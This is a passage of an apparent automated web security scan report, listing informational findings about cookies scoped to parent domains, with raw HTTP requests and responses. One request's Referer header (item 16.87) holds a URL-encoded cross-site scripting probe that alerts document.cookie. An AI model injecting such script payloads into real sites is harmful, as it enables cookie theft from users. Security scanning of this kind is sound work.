Set-Cookie: MUID=EE184531720E4743A15DC3BBC4F0985E; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:09 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 36444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.79. http://editorial.autos.redacted/used-cars/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://editorial.autos.redacted
Path:   /used-cars/default.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /used-cars/default.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:04 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=0f2992fc55e64374a8de46d105ca4355; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=8E803F046F9B48FC80C03D86EE3DD45F; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:04 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 34182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.80. http://entertainment.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://entertainment.msn.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: entertainment.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 51392
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=77a66bfe41db42d28e4f88077be1798b; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:46:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Celebrity
...[SNIP]...

16.81. http://entertainment.redacted/news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://entertainment.msn.com
Path:   /news/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/ HTTP/1.1
Host: entertainment.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 62350
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=995146dbfad74c20970e903f13e0f1ce; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:46:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Just In Ne
...[SNIP]...

16.82. http://entertainment.redacted/video/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://entertainment.msn.com
Path:   /video/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /video/ HTTP/1.1
Host: entertainment.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 26701
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=67f07d4e22dd45d1976d2b39e3c3771d; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:46:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   MSN Entert
...[SNIP]...

16.83. http://expression.microsoft.com/en-us/cc136530.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://expression.microsoft.com
Path:   /en-us/cc136530.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/cc136530.aspx HTTP/1.1
Host: expression.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAAD4BwAAfetuS+xFfAxTn86aknonWg!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:41:15 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:41:15 GMT
Content-Length: 66884


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link i
...[SNIP]...

16.84. http://health.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://health.redacted
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: health.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:55 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA19
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=1133fe74be594c568a34ac6ad24cff7a; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=CE873C51A3AB43DBA17ADCF0FD9904FA; domain=.redacted; expires=Wed, 17-Aug-2011 23:46:55 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 36431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://
...[SNIP]...

16.85. http://helenaspopkin.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://helenaspopkin.newsvine.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: helenaspopkin.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:07:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=4166254bf39fbdb2b2c04df95de6c650; expires=Sat, 25-Jan-2031 02:07:18 GMT; path=/; domain=.newsvine.com
Content-Length: 0
Content-Type: text/html
Connection: close


16.86. http://ib.adnxs.com/getuid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anj=Kfu=8fG6Q/DYS3+0s]#%2L_'x%SEV/i#+93=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiI0aU8E.A1>N#b#Qdqc@TwKrL$L2pv>3u[KE^pd=S(K$r@Fp>9H; icu=EAAYAA..; uuid2=4760492999213801733; sess=1;

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 31-Jan-2011 02:08:24 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sat, 30-Apr-2011 02:08:24 GMT; domain=.adnxs.com; HttpOnly
Location: ..*.
Date: Sun, 30 Jan 2011 02:08:24 GMT
Content-Length: 0
Connection: close


16.87. http://ib.adnxs.com/seg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?member=104&add_code=86011 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.reimage.com/lp/nhome/index.php?tracking=Neudesic69f18%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E602f708c63d&banner=&banner=728x90-1\&adgroup=direct&ads_name=direct&keyword=direct
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#_iB?.d1/(e7aL+.AJ_WH9u4SPD=p^m

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 31-Jan-2011 01:23:55 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sat, 30-Apr-2011 01:23:55 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sat, 30-Apr-2011 01:23:55 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG6Q/DYS3+0s]#%2L_'x%SEV/i#+93=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiI0aU8E.A1>N#b#QOC'2OMcvd#bcb!]*j^2`kdi6<Po<z!?1VRH; path=/; expires=Sat, 30-Apr-2011 01:23:55 GMT; domain=.adnxs.com; HttpOnly
Location: http://aidps.redcated/AI/Api/v1/UserRest.svc/Provider/1AC1C520-232B-4E3D-B0CC-A52AC15EB7D4/User/4760492999213801733/gif?meta=appNexus
Date: Sun, 30 Jan 2011 01:23:55 GMT
Content-Length: 0


16.88. http://ingame.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ingame.newsvine.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: ingame.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 02:07:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=2f27a7911e836626553146fb369daabe; expires=Sat, 25-Jan-2031 02:07:24 GMT; path=/; domain=.newsvine.com
Location: http://ingame.msnbc.msn.com/
Content-Length: 2
Content-Type: text/html
Connection: close



16.89. http://js.revsci.net/gateway/gw.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=A06546 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; udm_0=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; rsi_segs_1000000=pUPFek+FKAIQ1kNbPCvXupu0dYRBBw10Qnf0xWQrS0BEV6VWEHVfSnhpJVW5Lutkv1AyDl7qxTuCJgKvTPglemXPFwXO/l9yiURcsiUamtWcEzbP2TrfBHkE6to317EuNk9+iXSG4DvY1g/WBQ7a8qgeGg5oDbhmSSc5VoUxIBgQS/K4Q3yRHjMx2E0L81Hpbsggz0uWpYjffiAisiXmERkc/1665y5ZjB1b5STeJ4Pw4InvEOIoEyC78lpwlYmIydTi5ad2s/hOwYyScvdENQ==; rtc_0=MLsvrtMvcS5nJQFEBOfISErx+c1JMM1lDAyWHQIjVfvuhWI24GqMWoF/oWJdVrkRObfmVAFC7D5kNDpA7XLOLyXT7eHooUJSyInu6zq77Ti1xy5n8Qg3XeEe+tnQc/qNK5SeIuNm9OiemNvg0uPlUbqN72Pj+9+Ar1bDVU7hjepOYqJdor+NnFmpdNvQfxTIoHitxigPuoiTVzaqoruXF69raqbuvDx9NSxO37yG1cXJQrgqNEJYL+2aRbtieJoq+tCHUpTw8bYVhr5p0THE5yB09PMYdBM/swb+JMOM7Snl6/uAVD2lwzGGjsLQzOAv+uBqR8jCXnxVhvn7VWB6iHsq1LcapkedsIN3gi/o04igBj2IKrYeTcLWm4dMlDT7lMD1xWUmpmHTEibAOge6OBtRCgwHRB4CstW16Jo3oxnT; rsi_us_1000000=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Mon, 30-Jan-2012 01:29:41 GMT; Path=/
Last-Modified: Sun, 30 Jan 2011 01:29:41 GMT
Cache-Control: max-age=86400, private
Expires: Mon, 31 Jan 2011 01:29:41 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Sun, 30 Jan 2011 01:29:41 GMT
Content-Length: 5639

//Vermont-12.4.0-1012
var rsi_now= new Date();
var rsi_csid= 'A06546';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){this._rsiaa=Da;this._rsiba
...[SNIP]...

16.90. http://latino.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://latino.redacted
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: latino.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:08 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA48
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=3b8b0f18a4fc473bb2a2901d1486ffca; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
Set-Cookie: mh=MSFT; domain=.redacted; expires=Mon, 28-Jan-2013 23:47:08 GMT; path=/
Set-Cookie: CC=US; domain=.redacted; expires=Mon, 28-Jan-2013 23:47:08 GMT; path=/
Set-Cookie: hpsvr=D:blu|W:F|P:W; domain=.latino.redacted; expires=Sun, 01-Jan-2017 08:00:00 GMT; path=/
Set-Cookie: hpcli=0|W.1.1; domain=.latino.redacted; expires=Sun, 01-Jan-2017 08:00:00 GMT; path=/
Set-Cookie: hpwea=wc:USNY0996; domain=.latino.redacted; expires=Sun, 01-Jan-2017 08:00:00 GMT; path=/
Set-Cookie: FlightGroupId=74; domain=latino.redacted; expires=Mon, 28-Jan-2013 23:47:08 GMT; path=/
Set-Cookie: FlightId=BasePage; domain=latino.redacted; expires=Mon, 28-Jan-2013 23:47:08 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 72919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="es-us" lang="es-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.91. http://leadback.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=merchant_cs=1&betq=11325=420981 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.merchantcircle.com/corporate/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; BASE=YnQIx8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGrgJkH34AWEQ50klrods4GEQpslbnta1jyi06DY4goRuq7lNfytkpMGnkn13F/thphT9BVrj4TEB4tA8HhyePTdrXAHCI5I8ZJSPfosItSm2KGbW4bMg1diWeoat4pBWAsS0xuVBChK5UAQMdxKbZkoze5s76NIPb4CdQ/w8CXYuay4+lyQWK0GVSchMSu3n3ygrt1ByPVHFBx+JMtaedPpgtfj+pBX0truazR7M6ZuK9sVxhFZZ4MxpJbJc+KhQNAB0IaOZcfXUiSdOO0D8u4hyiFT/96RHBwMCa4UuiFfHFuaQQKkvI0Ica251TOMxGv0hzcvsl8LyNHqKFpTNKVBAUdzcbw/CzAvQzbu5wzg9ZCSgMt4q9GO44FPGyXSU1PH45OxD5VJciBItw68hvpOMeNkZCp6Oah7P40wy94BpsD33jn2wByhMmp+2rVS0xYYdyQ0dnp+0oE+uA!; ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 17:21:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=k4ZRNJpwIg02F1BCdbdRdgwUwXUHI8Y4F1BCYTeRdgQ3gZUHIQTnG1BCF2pRdgAohXUHIYZ4F1BCKGeRdgwohXUHIca4F1BCiGeRdgQshXUHwOIAM/oB0L7YCwAoGuxr1RQcKaYAGK2AI9YB7M53EkL3FJwgPXw6TVkJsuWB/0mxzfa7GIaWGDdrMaw41Zg3kq1B6bjxdp6bDwWZGu3r4fQsMaM+wa3BW8ox43I9HsfzFp/sNiQQoaUHs2DC1xmBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 17:21:40 GMT; path=/
Set-Cookie: GUID=MTI5NjQwODEwMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; domain=advertising.com; expires=Tue, 29-Jan-2013 17:21:40 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Sun, 30 Jan 2011 18:21:40 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

16.92. http://lifestyle.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:11 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA08
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=95617ed8b1e0449b8e93c4352fb8c4ef; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=F82F814B9CA14A8DA8EF5EB7228D86A7; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:11 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 31456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="
...[SNIP]...

16.93. http://lifestyle.redacted/relationships/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /relationships/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /relationships/ HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:17 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA09
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=ad185c8cd036476ab99f219f50cae67f; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=4ACBAFEABC3E458D93445CB0BF71AA56; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:17 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 37451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="
...[SNIP]...

16.94. http://lifestyle.redacted/relationships/staticslideshowglamour.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /relationships/staticslideshowglamour.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /relationships/staticslideshowglamour.aspx HTTP/1.1
